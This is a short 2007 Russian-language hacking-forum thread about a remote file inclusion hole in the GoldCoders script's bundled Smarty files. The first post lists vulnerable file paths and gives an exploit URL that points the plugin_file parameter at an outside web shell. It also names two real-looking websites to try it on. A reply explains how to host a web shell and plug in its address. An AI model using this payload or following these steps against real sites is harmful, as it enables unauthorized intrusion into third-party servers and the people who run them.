Уязвимость в скрипте GoldCoders

Discussion in 'Песочница' started by RRK, 9 Dec 2007.

  1. RRK

    RRK New Member

    Joined:
    9 Dec 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    есть данная уязвимость.


    filez ----
    inc/libs/Smarty.class.php
    inc/libs/Smarty_Compiler.class.php
    inc/libs/core/core.display_debug_console.php
    inc/libs/core/core.load_plugins.php
    inc/libs/core/core.load_resource_plugin.php
    inc/libs/core/core.process_cached_inserts.php
    inc/libs/core/core.process_compiled_include.php
    inc/libs/core/core.read_cache_file.php
    +++++++++++++++++++++++++++++++++
    u can find more then this one
    exploit :
    http://victim/inc/libs/Smarty_Compiler.class.php?plugin_file=http://shell/?

    непонятно как данный сплойт работет. Пробывал забивать как написано выше напримере + несколько вариантов, нечего не работает.

    потестировать можно здесь:
    http://manager.rbh-bank.com
    http://mymusicmyprofit.com
     
  2. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    И чего тут сложного?
    С первого взгляда инклуд файлов...
    Льешь веб шел на какойнить хостинг и указываешь вместо http://shell/ путь к веб шелу...
    А вообще поищи статьи на эту тему их полно ;)
     
Loading...